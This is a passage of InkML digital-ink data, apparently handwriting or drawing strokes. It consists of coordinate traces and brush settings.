0-16,-1 0 15,1 0-15,-1 0 16,1 0-16,-1 0 16,-34 0-16,17 0 15,-36 0-15,1 0 16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21.5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408 14870 0,'18'17'0,"35"1"15,-18-18-15,53 35 16,-17-35-16,35 0 16,17 0-16,18 0 15,18 18-15,53-18 16,-18 0-16,17 0 15,-34 0-15,17 0 16,-36 0-16,-16 0 16,-1 0-16,-18 0 15,-17 17-15,-35-17 16,-36 0-16,-18 0 16,1 18-1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23.5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40 16351 0,'-18'0'47,"36"0"-16,17 0-15,36 0-1,-18 0-15,88 0 16,17 0-16,36 0 15,1 0-15,51 0 16,-34 0-16,35 0 16,18 0-16,-36 0 15,0 0-15,-35 18 16,-35-18-16,-35 0 16,-36 0-16,-35 0 15,0 0-15,-18 0 16,-18 0-1,1 0-15,0 0 16,-1 0 0,1 0-16,17 0 15,-17 0-15,17 0 16,-17-18-16,17 1 16,0 17-1,1-18-15,-19 18 0,1 0 16,35 0-16,-35-18 15,-1 18-15,1 0 16,123 0 15,-71 0-31,54 0 16,105 0 31,-193 0-47,-1 0 62,-18 0-62,19 0 16,17 0 0,17 0-16,-17 0 0,-18 0 15,18 0-15,0 18 16,0-18-16,18 0 15,35 0 1,-36 0-16,36 0 0,-18 18 16,-17-1-1,-1-17-15,-17 18 0,-18-18 16,1 0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8:24.7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602 4533 0,'0'0'0,"18"-17"16,-18-1-16,35 0 16,-17 18-16,35-17 15,0-1-15,0 18 16,35 0-16,-18 0 15,1 0-15,35 0 16,-53 0-16,0 0 16,0 0-16,-1 0 15,1 0-15,18 0 16,-1 0-16,1 0 16,35 0-16,-18 0 15,36 0-15,-19 0 16,19-18-16,17 18 15,0 0-15,0 0 16,36 0-16,-36 0 16,-35 0-16,17-17 15,18 17 1,0 0-16,0 0 16,0 0-16,1 0 0,34 0 15,-17 0 1,-18 0-16,18 0 15,17 0-15,-35 0 16,0 0-16,-17 0 16,-54 0-16,-17 0 15,-35 0-15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39.1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667 10087,'0'0,"-18"19,0-19,18 18,0 0,36-18,0 0,1 18,17 18,0-18,73 1,-18-1,91 18,-37 0,19-18,-37 1,18-19,37 0,-19 0,-36 0,18 0,-17 0,-1 0,0 0,0 0,-54 0,-1 0,1 0,-18 0,-37 0,0 0,-18 0,19 0,-37-19,18 19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8:25.4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346 4392 0,'0'-18'78,"17"18"-78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8:26.7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452 4357 0,'35'0'94,"18"0"-94,88 17 16,0 1-16,18 0 15,35 17-15,53 0 16,-18-35-16,0 0 16,1 0-16,-19 0 15,160 0 1,-160 0-16,-69 0 15,-19 0-15,1 0 16,-54 0-16,18 0 16,-17 0-16,17 0 15,-17 0-15,17 0 16,18 0-16,-1 0 16,37 0-16,-37 0 15,19 18-15,-36-18 16,18 18-16,-18-18 15,18 0-15,-18 17 16,88-17 0,-105 0-1,0 0-15,-18 0 16,-1 0-16,1 18 16,0-1-16,-17-17 15,16 18-15,1-18 16,0 0-16,-17 0 15,-1 0-15,-17 0 16,34 18-16,1-18 16,0 0-16,18 17 15,-1-17-15,-17 0 16,18 0-16,35 0 16,-36 0-16,1 0 15,-18 0-15,0 0 16,17 0-1,18 0-15,36 0 0,-18 0 16,0 0-16,-1 0 16,19 18-1,-1 0-15,-35-1 16,54 1-16,-19 0 16,-17-1-16,-18 1 15,0-1-15,-17-17 16,-36 0-16,0 0 15,-17 0-15,-18 18 79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8:33.1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66 11783 0,'0'0'0,"-3051"335"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8:37.2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73 15011 0,'0'0'0,"0"-36"16,53 36 15,-1-17-31,54-1 0,35 18 16,36 0-16,-1 0 16,54-18-1,-19 18-15,18 0 16,36 0-16,-53-17 15,17 17-15,0 0 16,-35 0-16,18 0 16,0 0-16,-36 0 15,18 0-15,-53 0 16,0 17-16,0 19 16,-17-36-16,-71 17 15,35 1-15,-70-18 94,17 0-94,0 0 16,0 0-16,-17 0 15,0 0 1,-18 18 124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2:17.3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87 5576 0,'19'0'62,"61"20"-46,39 19-1,59 61-15,41-41 16,19-39 0,-40 0-16,1-20 15,-60 20-15,-40-20 16,-20 0-16,1 0 16,-41 0-16,1 0 15,0 0-15,-21 0 16,1 0-16,40 0 15,-20 0-15,-1 0 16,-19 0-16,20 0 16,-1 0-16,-19-20 15,0 20-15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3:28.4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61 7382 0,'40'0'93,"99"0"-93,40 0 16,19 0-16,40 0 16,0 0-16,60 0 15,-20 0-15,0 0 16,-20 0-16,-1 0 16,-38 0-16,39 0 15,-20 0-15,0 0 16,0 0-1,0 0-15,-79 0 16,-99 0-16,59 0 16,0 0-16,-20 0 15,-40 0-15,1 0 16,-40 0-16,0 0 16,-1 0-1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3:42.8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26 7421 0,'20'0'79,"39"0"-79,21 0 15,-1 0-15,20 0 16,40 0-16,0 0 15,40 0-15,-1 0 16,21 0-16,-1 0 16,1 0-16,-21 0 15,1 0-15,-40 0 16,39 0-16,-19 0 16,40 0-16,-41 0 15,-118 0-15,119 0 16,0 0-16,-1 0 15,1 0-15,-20 0 16,20-20 0,-40 1-16,0 19 15,0 0-15,-20 0 16,40 0-16,0 0 16,-40 0-16,60 0 15,-20 0-15,0 0 16,-20 0-16,20 0 15,-80 0-15,60 0 16,0 0-16,-19 0 16,19 0-16,-20 0 15,40 0-15,-40 0 16,-20 0-16,-19 0 16,19 0-16,1 0 15,-21 0-15,1 0 16,-1 0-16,1 0 15,19 0-15,20 0 16,-19 0-16,-41 0 16,61 0-16,39 0 15,-40 0-15,40 0 16,19 0-16,-39 0 16,20 0-16,0 0 15,0 0 1,-40 0-16,40 0 15,-39 0-15,19 0 16,-20 0-16,40 0 16,-60 0-16,0 0 15,1 0-15,-60 0 16,19 0-16,-19 0 16,0 0-16,0 0 15,0 0 1,0 0-16,-1 0 31,1 0-15,0 0-1,0 0-15,0 0 16,0 0-16,-1 0 16,1 0-16,0 0 15,20 0-15,-20 0 16,19 0-16,21 0 15,-1 0-15,-39 0 16,0 0-16,20 0 16,-20 0-1,0 0 1,-1 0-16,-19-20 31,20 20-31,-20-20 16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3:44.3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42 8969 0,'19'0'0,"1"0"16,0 0 0,40 0-16,39 0 15,60 0-15,-1 0 16,21 0-16,-20 0 16,-1 0-16,-19 0 15,-59 0-15,-60 0 16,19 0-16,-19 0 15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7:04:35.5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723 15021 0,'20'0'47,"19"0"-32,21 0-15,19 0 16,1 0-16,19 0 16,60 0-16,-1 0 15,-78 0-15,118 0 16,1 0-16,-1 0 16,-39 0-16,-40 0 15,-40 0-15,-19 0 16,-40 0-16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31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7 14446 0,'0'36'63,"35"122"-63,36-52 15,17 35-15,-71-88 16,36 18-16,36 35 15,-72-89-15,36 1 16,-35-18 0,-1 0-1,1 0-15,17-35 16,1-1-16,34-87 16,-17-1-16,18-17 15,17-18-15,-35 18 16,-18 53-16,18-18 15,-35 71-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2425.8385">988 7250 0,'35'35'78,"-17"-35"-62,-18 17-16,35 1 16,0 0-1,-17-18 1,0 17-16,-1-17 15,1 18-15,-1-18 32,1 0-32,0 0 47,70-53-32,-18-53-15,1-17 16,35-1-16,-36-34 15,1 52-15,-18 18 16,-35 35-16,-1 17 16,1 36-16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40.6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69 11666,'0'0,"36"0,19 0,-1 0,0 0,1 0,17 0,-17 0,-19 0,19 0,-1 0,0 0,19 0,18-18,-37 18,19 0,-1 0,-35 0,17 0,-18 0,1 0,-1 0,-18 0,0 0,0 0,0 0,19 0,-19 0,0 0,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28.3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87 2081 0,'-17'0'15,"-19"36"-15,1-36 16,0 35-16,-18-17 16,-35-1-1,17 36-15,-35 0 0,0 0 16,-17 0-1,17 17-15,0-17 16,0 0-16,-70 71 31,70-71-31,53-18 16,36 0-16,17-17 16,0 0-16,0 17 15,0-18-15,0 19 16,0-19-16,35 19 15,0 17-15,0-18 16,36 0-16,35 0 16,17 1-16,36-1 15,53-17-15,35 34 16,-18-34-16,-17-18 16,-18 0-1,-53 0-15,-53 0 0,-17 0 16,-18 0-16,-18 0 15,-35-18 1,0-34 0,0 16-1,0-17 1,0 18-16,0-35 16,0 34-16,0-17 15,-35-35-15,-18 0 16,0 17-16,-36-34 15,1 16-15,0-16 16,-71-19-16,71 53 16,-18-17-16,0 0 15,18 0-15,18 0 16,34 52-16,19 19 16,17-18-16,0 70 62,0 71-46,0-1-16,0 19 15,0-1 1,0 36-16,0-18 0,17 36 16,1-36-16,35-18 15,18 1-15,-19-36 16,1-35-1,-17 17-15,-19-52 0,1 17 16,0-17-16,-18 0 16,17-1-1,-17 1 1,0-1 0,18-17 46,-1-17-46,1-36-16,0-18 15,17-34-15,-17 16 16,17-34-16,53-18 16,-35 35-16,0-53 15,0 0-15,0-17 16,-18 35-16,-17 35 15,17-17-15,-35 34 16,0 37-16,0-1 16,0 17-1,0 1-15,0 17 0,0 1 16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29.8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64 4110 0,'17'0'47,"36"0"-47,18 0 16,35 0-16,70 0 15,36 0-15,17 0 16,0 0-16,-17 18 16,-18-18-16,-53 0 15,-53 0 1,-17 0-16,-36 0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37.1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085 5609 0,'18'0'47,"17"0"-47,0 0 16,36-17-16,17 17 15,36 0 1,17 0-16,-18 0 0,18 0 16,0 0-16,18 0 15,-35 0 1,17 0-16,0 0 16,-53 0-16,18 0 15,-35 0-15,17-18 31,-53 18-31,-17 0 16,-1 0-16,19 0 16,-1 0-16,159 0 31,-124 0-31,1 18 16,0-18-16,17 17 15,-18 1-15,36-18 16,-35 17-16,-18-17 15,-18 0-15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38.3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64 6862 0,'0'0'0,"17"0"16,1 0-16,0 0 31,-1 0-31,19 17 16,52 1-16,-35-1 15,35-17-15,35 0 16,18 18-16,54-18 15,-37 0-15,72 0 16,-19 0-16,1 0 16,52 0-1,-34 0-15,-19 0 16,-34 0-16,17 0 16,-53 0-16,-18 0 15,-52 0-15,-53 0 16,-1 0-16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41.0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90 6826 0,'18'0'47,"-1"0"-47,36 0 15,18 0-15,-1 0 16,54 0-16,17 0 16,0 0-16,0 0 15,18 0-15,-18 0 16,0 0-16,0 0 16,-17 0-16,-1 0 15,18 0-15,-35 0 16,18 0-16,-1 0 15,18 0-15,18 0 16,17 0-16,-17 0 16,35 0-16,-17 0 15,-36 0-15,35 0 16,-17 0-16,105 0 31,-158 0-31,35 0 0,-17 0 16,-18 18-16,-18-18 15,35 18 1,-70-1-16,0-17 16,-35 0 93,-1 0-15,1 0-94,0 0 15,17 0-15,18 0 16,0 0-16,17 0 16,19 0-16,-1 0 15,18 0-15,-18 0 16,35 0-16,-17 18 16,35-18-16,18 0 15,-36 17-15,19 1 16,-19 0-16,0-1 15,-52 1-15,0 0 16,34-1-16,-52-17 16,0 18-16,-17-18 15,-1 0 1,18 0-16,-18 0 16,0 0-16,1 0 15,-1 0-15,18 0 16,17 0-16,19 0 15,16 0-15,-16 0 16,34 0-16,-35 0 16,18 0-16,-18 0 15,18 0-15,-18 0 16,-17 0-16,-18 0 16,17 0-16,1 0 15,35 0-15,-36 0 16,18 0-16,36 0 15,17 0-15,-18 0 16,36 0-16,35 0 16,-17 0-16,-1 0 15,0 0-15,-52 0 16,17 0-16,-18 0 16,-34 0-16,-19 0 15,36 0-15,-35 0 16,-18 0-16,17 0 15,-17 0 1,0 0-16,0 0 16,0 0-16,0 0 15,0 0-15,17 0 16,-17 0-16,-18 0 16,18 0-16,0 0 15,18 0-15,-18 0 16,35 0-16,0 0 15,36 0-15,34 0 16,-17 0-16,18 0 16,0 0-16,-18 0 15,-18 0-15,19 0 16,-54 0-16,0 0 16,18 0-16,-36 0 15,1 0-15,-18 0 16,0 0-16,0 0 15,0 0-15,17 0 16,-35 0-16,1 0 16,-1 0-16,18 0 15,-18 0-15,0 0 16,1 0 0,-1 0-16,-17 0 0,35 0 15,-36 0 1,18 0-16,1 0 15,34 0-15,-17 0 16,18 18-16,17-1 16,-17 1-16,-19-18 15,1 0-15,-17 0 16,-19 0-16,1 0 16,0 0 77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42.8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8167 0,'18'-18'31,"-18"1"-31,17 17 16,36 0-16,18 0 15,35 0-15,17 0 16,36 0-16,0 0 15,52 0-15,54 0 16,-18 0-16,70 0 16,-17 0-1,-53 0-15,53 0 0,-53 0 16,35 0-16,-70 0 16,52 0-16,-34 0 15,-1 0 1,0 0-16,-35 0 15,18 0-15,0 0 16,-1 0-16,-52 0 16,0 0-16,317 0 31,-317 0-31,-18 0 16,0 0-16,35 17 15,-105-17 1,52 18-16,-52-1 0,17-17 15,-35 0-15,-18 0 16,-17 0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43.6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853 8220 0,'18'0'15,"35"0"1,17 17-16,19-17 15,16 0-15,1 0 16,71 0-16,-36 0 16,18 0-16,-18 0 15,0 0-15,18 0 16,35 0-16,-36 0 16,19 0-16,-36 0 15,0 0-15,18 0 16,-36 0-16,-35 0 15,-17 0-15,-1 0 16,19 0-16,-36 0 16,-1 0-16,-16 0 15,-19 0-15,1 0 16,0 0-16,-1 0 16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45.1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951 8114 0,'18'0'93,"87"0"-77,72 0-16,34 0 0,72 0 16,-1 0-1,53 0-15,53 0 0,53 0 16,35 0 0,-35 0-16,-158 0 15,105 0-15,-124 0 16,-35 0-16,-17 0 15,-53 0-15,-18 0 16,-35 0-16,-36 0 16,-17 0-16,-17 0 15,-1 0-15,-17 0 16,17 0-16,-18 0 16,1 0-16,0 0 15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49.1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87 9402 0,'71'-18'140,"17"18"-140,18 0 16,17 0-16,36 0 15,35 0-15,0 0 16,-18 0-16,36 0 16,0 0-16,-18 0 15,-36 0-15,36 0 16,-52 0 0,-37 0-16,19 0 0,-54 0 15,1 0-15,-18 0 16,-18 0-1,-17 0 1,-1 0-16,1 0 172,0 0-156,-1-18-16,1 18 15,0 0 1,-4093-17-16,8185 17 15,-4092 0 1,17-18-16,-17 18 16,17-18-16,0 18 15,18 0-15,-18 0 16,1 0-16,-19 0 16,-4074 0-16,8149 0 15,-4074 0 235,17-17-234,-17 17-1,17-18 1,-17 18 187,0 0-203,-1 0 16,18 0-16,-17 0 15,35 0-15,18 0 16,70 0-16,35 0 16,36 0-16,35 0 15,17 0-15,124 0 16,142 0-16,-107 0 16,35 35-16,-17-17 15,-53 17-15,-35-17 16,53 35-16,-124-18 15,-35-17-15,-18-1 16,18 36 0,-17-53-16,-36 18 15,-36 17-15,-34-17 16,-18-1-16,0 1 16,-54-18-16,1 0 15,-17 0-15,-19 18 16,1-18-16,17 0 297,1 0-297,16 0 15,37 0-15,34 0 16,1 0-16,17 0 16,0 0-16,0 0 15,0 0-15,18 0 16,-18 0-16,0 0 15,0 0-15,-35 0 16,0 0-16,-18 0 16,-35 0-16,17 0 15,-17 0-15,18 0 16,-18 0-16,17-18 16,1 18-16,-1 0 15,-17 0-15,0 0 16,-17 0-16,-1 0 15,0 0-15,-17 0 16,17 0-16,0 0 16,-17 0-16,0 0 15,-1 0-15,1 0 16,0 0 0,-1 0-1,1 0 1,35 0-16,-18 0 15,36 0-15,-18 0 16,-1 0-16,19 18 16,-36-18-16,18 0 15,-35 0-15,-1 0 16,1 0 15,0 0-15,17 0-1,-17 0-15,35 0 0,-18 0 16,18 0-16,-18 0 16,0 0-16,1 0 15,-1 0-15,-18 0 16,1 0-16,-18 17 172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58.08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22 10883 0,'18'0'47,"0"0"-32,-1 0 1,1 0-1,35-17-15,-35 17 16,35 0-16,-1 0 16,1 0-16,36 0 15,-19 0-15,54 0 16,-1 17-16,71 18 16,-53-17-16,53 0 15,-35-1-15,194 36 16,-4251-17-1,8113-19-15,-4038 1 16,-19-18-16,1 35 16,35-35-16,18 0 15,-36 0-15,36 0 16,-36 0-16,-17 0 16,-18 0-16,-17 0 15,-36 0-15,18 0 16,-36 0-16,1 18 15,-1-18-15,-17 0 16,0 0-16,141 0 31,-70 0-31,17-18 0,18 18 16,17-18 0,-17 18-16,-18 0 15,0 0-15,0-17 16,-35-18-16,17 17 15,-17-17-15,-53 35 16,0 0-16,-18-18 16,-17 18 15,-1 0-15,19 0-1,-19 0-15,19 0 16,17 0-16,0 0 15,35 0-15,53 0 16,-18 0-16,18 0 16,18 0-16,18 0 15,-72 0-15,36 0 16,-35-18-16,0 1 16,-18-1-16,1 0 15,-37 18-15,-16 0 16,-19 0-16,1-17 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7:26.813"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.08819" units="cm"/>
      <inkml:brushProperty name="height" value="0.35278" units="cm"/>
      <inkml:brushProperty name="color" value="#B4CDE2"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4209 12500,'0'-18,"-18"18,0 0,0 0,0 0,-37 0,19 0,-18 0,-19 0,-36 0,37 0,-19 0,-36 0,18 0,18 18,19 19,-1-19,19 18,-19 37,1-19,35-18,19-17,-18 35,18 0,0-17,-19 35,1 19,0 0,36-1,0-17,0-19,0 37,0-18,0-1,0 1,0-19,0 1,36 17,-18-17,0-37,19 18,-37 0,36-17,36 17,-53-18,17 0,-18 0,0-18,0 0,0 0,1 0,-1 0,-18-18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7:42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8 11611,'54'0,"19"0,17 0,19 0,54 0,19 19,-37-19,18 0,19 0,-19 0,55 0,-37 0,1 0,53 36,-17-18,0-18,0 0,17 0,-17 18,18-18,-36 18,-55 0,0-18,73 0,-73 0,0 19,-18-19,18 0,-18 0,-18 18,0-18,18 0,18 18,-36-18,-19 0,37 0,-36 0,36 0,-36 0,18 0,0 0,-1 0,19 0,-18 0,0 0,-36 0,-19 0,-18 0,1 0,-19 0,0 0,0 0,0 0,-18-18,18 18,1 0,-1 0,0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07:59.1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24 10619 0,'0'0'0,"0"-18"31,18 0-15,17 18-16,0 0 15,36 0-15,-18 0 16,0 0-16,52 0 16,1-17-16,-35-1 15,17 0-15,0 18 16,-17 0-16,35-17 15,-18 17 1,35 0-16,1 0 0,17 0 16,0 0-16,18 0 15,35 0 1,35 0-16,53 0 16,-52 35-16,34 18 15,-70-53-15,-35 18 16,-89-18-16,-52 0 15,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0-16,1 0 16,0 0-1,-1 0 1,1 0 15,0 0-31,-1 0 16,1 0-1,-1 0 17,-17 17-1,18-17-16,0 0-15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3:37:36.7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70 4057 0,'18'123'78,"17"-70"-78,0 0 15,-17-17-15,-1-1 16,19-35 46,-19 0-62,19 0 16,16-18-16,19-158 16,17 17-16,36-53 15,70-52-15,-71 70 16,89-106-16,-124 159 16,0 17-16,-17 54 15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22.8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70 11536 0,'0'0'0,"0"-18"32,-17 18-32,-18-17 15,17-19-15,-17 36 16,-1-17-16,1-1 15,0 18-15,-1 0 16,1-18-16,0 18 16,0 0-16,17-17 15,-17 17 17,17 0-32,0 0 15,-34-18-15,16 0 16,-34 1-1,34 17-15,-17-18 16,1-17-16,16 35 16,1-18-16,0 18 15,-1-17-15,19-1 16,-18 18-16,-1-18 16,19 1-1,-1 17-15,0 0 16,1-18-16,-19 0 15,36 1-15,-17-1 16,-36-17-16,35 0 16,1 35-1,-1-18 1,0 0 0,1 18-1,-1-17 1,0-1-1,1-17-15,-1 35 16,1-36-16,-19 19 16,36-1-16,-35 1 15,17 17-15,18-18 16,-17 18-16,17-18 16,-18 18-1,-17 0 16,17-17-15,0 17 0,-17-18-16,0 18 15,0-18-15,17 18 16,0-17 0,1 17-16,-1-18 15,0 18 1,-17 0-1,18 0 1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36.3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90 8767 0,'18'0'15,"-1"17"1,19 1 0,-19-18-16,18 35 15,18-17-15,-35-1 16,0 1-16,35 17 16,-36-17-16,1-18 15,-18 18 1,18-18-16,-18 17 15,17-17 1,-17 18-16,18-1 16,-1-17-16,-17 18 15,18 0-15,0-1 16,-18 1 0,17-18-16,1 18 15,0-1-15,-1 1 16,1 0-16,17-1 15,-35 1-15,35 0 16,1-1-16,-19 1 16,36 17-16,-17-17 15,16 17-15,-16-17 16,-1-1-16,18 1 16,-35 0-16,-1-18 15,18 0-15,-35 17 16,18 1-1,0-18 17,-1 17-32,1-17 15,17 18 1,-17 0-16,17-1 0,18 19 16,-35-36-1,-1 17-15,19 1 16,-19-18-1,1 0 79,0 0-78,-1 0-16,19 0 15,-19 0 1,1 18-16,-1-18 16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39.0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714 8608 0,'-18'0'94,"-17"17"-94,-1 1 16,-17-18-1,18 0-15,0 0 16,0 18-16,-1-18 16,-17 17-16,36-17 15,-36 18-15,18-18 16,-36 35-16,18-17 15,0-18-15,-17 35 16,17 0-16,-53 1 16,18-1-16,-18 0 15,35-17-15,36 17 16,-18-17-16,0 17 16,18-17-16,17-1 15,-35 19-15,1-19 16,16 19-16,-34-1 15,17 0-15,17-17 16,1 17-16,-18 0 16,18 1-16,17-19 15,1 1-15,-19 0 16,19-1 0,17 1-16,-18-1 15,18 1-15,-17 0 16,-1-1-1,18 1 1,0 0 15,-18-1-31,18 1 32,-35-18 124,0 18-141,17-1 1,0-17-16,1 0 16,17 18-1,-18-18 1,1 17 0,-19-17-16,1 0 15,-18 36-15,0-19 16,0-17-16,36 0 15,-1 0-15,18-17 204,-18 17-189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40.7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38 8996 0,'0'17'47,"-18"1"-47,-17 17 16,18-17 0,-1 0-16,0 35 15,1-36-15,-19 1 16,19 35-16,-19-18 15,36 0-15,-53 18 16,36 0-16,-18 0 16,-1-18-16,19-17 15,-1 17-15,0-17 16,18 0 0,0-1-1,0 1-15,0-1 16,0 1 15,0 0-15,0-1 31,0 1 109,36-18-141,-1 0 1,18 0-16,-18 0 16,0 0-16,1 0 15,-1 18-15,18-1 16,-35 1-16,52 17 16,1 0-1,-36 1 1,53-19-16,-35 19 0,0-19 15,-18 1-15,0-18 16,-17 0 172,-36-35-157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52.11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32 11218 0,'-35'0'47,"17"18"-32,-17 17 1,17-17-16,1 0 16,-1-1-1,0 1-15,1-1 16,17 1-16,-18 0 15,18 17 1,-18-17 0,18-1-1,0 19-15,-17-19 16,-18 1-16,35 35 16,-18 0-16,0-36 15,18 1-15,-17 35 16,-1-35-16,18-1 15,-18 1 1,18-1 0,0 1-16,0 0 15,-17 17 1,-1-17 0,-17 17-1,-1-17 1,36-1-1,-17-17 1,-1 18-16,1-18 16,-1 17-1,-17 1 1,17 0 0,-17-1-1,17 1 48,-17 17-32,17-17 0,1 0-31,-1-18 16,0 17-16,1-17 15,-1 18-15,-17-1 16,17-17-16,0 18 16,-17 0-16,18-18 62,-1 17-46,0-17-1,1 0-15,-1 18 16,0 0 15,1-18 1,-1 17-17,-17-17-15,17 18 16,-17 0-16,17-18 31,18 17-15,-17-17-1,-1 18 17,18-1-17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53.2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44 11695 0,'0'17'47,"0"1"-47,0 0 16,0 17-16,0-18 15,0 19-15,0-1 16,0-17-16,0 17 16,0 0-16,-17 0 15,-1-17-15,1 0 16,-19-1-16,19 19 16,-1-36-16,18 17 15,-18-17 1,18 18-16,-17 0 187,34-18-171,1 0 0,0 17-16,35 18 15,17 18-15,18 18 16,36 17-16,-18-17 15,70 35-15,-35-1 16,35-16-16,-17 16 16,18-34-16,-72-53 15,1 17-15,-70-17 16,-36-36 109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54.7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271 10830 0,'0'0'0,"0"18"16,18 0-16,-18-1 15,18 1 1,-1-1-16,18 19 16,-17-1-16,35 0 15,-35 1-15,17-1 16,-17-18-16,-1 1 15,1 0-15,-1-1 16,1-17-16,-18 18 31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55.4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465 10513 0,'0'0'0,"18"0"15,0 0-15,17 0 16,0 0 0,36 0-16,-1 0 0,54 0 15,-1 0-15,1 0 16,17 0-1,-35 0-15,17 0 0,-52 0 16,-36 0 0,0 0-16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28:06.2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46 11575,'19'0,"17"0,36 0,37 0,36 0,1 0,-38 0,19 0,19 0,-1 0,0 0,-18 0,18 0,18 0,19 0,-19 0,0 0,-18 0,1 0,35 0,-54 0,-18 0,18 36,-36 1,-1-19,19 0,36-18,-36 18,-36-18,-1 18,-17-18,54 0,-1 0,-35 0,-19 0,-35 0,35 0,-36 0,18 0,-17 0,-1 0,0 0,0 0,0 0,0 0,19 0,17 0,-36 0,-18 18,18-18,0 0,1 19,17-19,18 0,-17 0,-19 0,0 0,0 0,0 0,-18 18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6-03T03:11:14.1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90 5627 0,'0'17'15,"-18"-17"1,18 18-16,-17-18 16,-1 18-16,0 17 15,1-35 1,-1 18-16,-35-1 16,18 1-16,17 0 15,1-1-15,-19-17 16,1 35-16,0 1 15,-53 34 1,17-34-16,18 34 16,-18-35-16,19 1 15,-37 17-15,54-18 16,-18 0-16,-17 18 16,-1 0-16,18-18 15,18-17-15,-18 35 16,-53 35-16,18-17 15,0-1-15,-18 18 16,0 1-16,18-19 16,17-17-16,36 0 15,-18-18-15,0 0 16,36-17-16,-36 35 16,35-53-16,0 18 15,-35 17-15,36-17 16,-18-1-16,-18 18 15,-18 1-15,18-1 16,18-17-16,-18 17 16,0-35-16,0 35 15,18-17 1,17-18-16,-17 18 0,0-1 16,-1 1-1,1-1-15,-18 19 16,18-19-16,0 19 15,-1-36-15,1 35 16,-35-17-16,34 17 16,19-18-16,-19 1 15,-17 0-15,18-1 16,0 1-16,-18 0 16,18-1-16,-54 1 15,37 0-15,-37 17 16,36-35-16,1 18 15,16-1-15,1 1 16,0-1-16,-1-17 16,19 18-16,-1 0 15,1-1 1,-1 1 0,0 17-1,1 1-15,-1-19 16,-17 36-16,17 0 15,0-18-15,-35 1 16,36 16-16,-1-16 16,1-1-16,-19 0 15,36 1 1,-35-1-16,17-18 0,18 19 16,-17-1-16,-1 0 15,0 1 1,1-1-16,17-17 15,-18-1 1,1 1 0,-1-18-16,18 17 15,-18-17-15,1 0 16,-1 18 0,-17 0 15,35-1-16,-18 1-15,0 0 0,1-18 16,-18 17-16,-36 36 16,-70 88-1,-71 106-15,-70 53 0,70-159 16,106-88-16,106-35 31,0 17 16,-35 36-31,0-36-16,17-17 15,1-1 1,-1-17 0,-35 53-1,0 18-15,-88 34 16,70-34-16,19-18 15,16-53-15,36 18 16,-35-1-16,35 1 16,-18-18-16,1 18 15,-1 34-15,0-52 16,1 36-16,-1-1 16,1-17-1,-1 17-15,18 0 16,-18-17-16,-17 17 15,35 0-15,-18-17 16,1 17 0,17-17-16,-18 0 15,0 34-15,1-16 16,-18 17-16,35-36 16,0 1-16,-18 17 15,0-17-15,18 17 16,0 0-1,-17-17-15,-1 17 16,18 1-16,-18-19 16,18 1-16,0 17 15,-17-17-15,17-1 16,-18 1-16,18 17 16,0-17-16,-18 17 15,1 1-15,17-19 16,-18 18-16,0-17 15,18 0-15,0-1 16,-17 1-16,-1 0 16,1 17-16,17-17 15,-18-1 1,0 1-16,18 0 16,-17-1-16,17 1 15,-18-18 1,18 17-16,0 1 0,-18 17 47,1-17 0,-1 17-32,0-17 95</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1290.247">2522 11448 0,'-17'0'78,"-1"17"-62,18 36-16,0-18 16,0-17-16,-35 17 15,35 1-15,0 17 16,-18-18-16,18 18 16,0-36-16,0 1 15,0 0-15,0 17 16,0-17-16,0 17 15,0 18-15,0-18 16,0-17 0,0-1-1,0 1-15,0 0 16,0-1 0,0-34 109,18-1-110,-1 0 1,36-17-16,36 0 15,34 17-15,18-17 16,36 0-16,34-1 16,-17 19-16,-35-19 15,-53 36-15,-71-17 16,-35-1 109,0 1-109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1:17.80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99 6738 0,'17'0'15,"1"0"1,0 0-16,-1 0 16,36 0-16,18 0 15,17 0 1,71 0-16,35 0 16,-18 0-16,36 0 15,-1 0-15,-70 0 16,-52 0-16,-1 0 15,-53 0-15,-17 0 16,-1-18 25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1:20.1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103 6650 0,'18'-18'31,"17"18"-15,0 0-1,-17 0-15,35 0 16,-18-17-16,0 17 15,1 0-15,17-18 16,-1 18-16,1-18 16,0 18-16,18 0 15,-18 0-15,17 0 16,-17 0-16,18 0 16,-18 0-16,-18 0 15,-17 0 1,17 0-16,-17 0 15,17 0-15,-18 0 0,19 0 16,17 0 0,-18 0-16,18 0 15,0 0-15,0 0 16,0 0-16,0 0 16,-1 0-16,1 0 15,-17 0-15,-1 0 16,-17 0-16,-1 0 15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1:24.1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69 7179 0,'35'0'94,"1"0"-94,17 18 15,0-18-15,-1 0 16,37 17-16,16-17 15,37 0-15,-1 18 16,0-18-16,-18 0 16,-34 0-16,-19 0 15,-17 0-15,-35 0 16,-1 0-16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1:26.4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267 7285 0,'36'0'78,"-1"0"-62,18 0-16,0 0 16,17 0-16,-17 0 15,35-18-15,-17 1 16,-1-1-16,-17 18 15,0-18-15,-17 18 16,-19 0-16,1 0 16,-1 0 77,1 0-77,0 0-16,-1 0 16,19 0-1,-1 0-15,18 0 16,0 0-16,35 0 16,-35 0-16,17 0 15,1 0-15,-18 0 16,0 0-16,17 0 31,-52 0-31,0 0 16,-1 0 281,1 0-204,0 0-61,-1 0 30,1 0-15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2:03.2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99 10866 0,'17'-18'125,"1"18"-109,17 0 0,0 0-16,18 0 15,-17 0 1,52 0-16,35 0 0,18 0 15,18 0-15,-18 0 16,-17 0 0,17 0-16,-18 0 0,-17 0 15,35 0-15,-17 0 16,-18 0-16,-1 0 16,1 0-16,0 0 15,0 0-15,-18 0 16,-17 0-1,35 0-15,-54 0 0,19 0 16,0 0 0,-19 0-16,1 0 15,18 0-15,-1 0 16,-17 0-16,0 0 16,18 0-16,-18 0 15,17 0-15,-17 0 16,-17 0-16,16 0 15,-34 0-15,35 0 16,-35 0-16,17 0 16,-17 0-1,-1 0-15,18 0 16,1 0-16,-1 0 16,-17 0-16,35 0 15,0 0-15,-1 0 16,37 18-16,-1-1 15,-18-17-15,19 0 16,-19 18-16,18-1 16,-17-17-16,-1 0 15,-17 18-15,18-18 16,17 0-16,-35 0 16,18 0-16,-1 0 15,1 0 1,-1 0-16,1 0 15,-1 0-15,1 0 16,-1 0-16,1 18 16,-18-18-16,0 17 15,-18-17-15,18 0 16,-35 18-16,-1-18 16,1 0-16,0 0 15,-1 0 173,1 0-157,-1 0-15,1 0-1,0 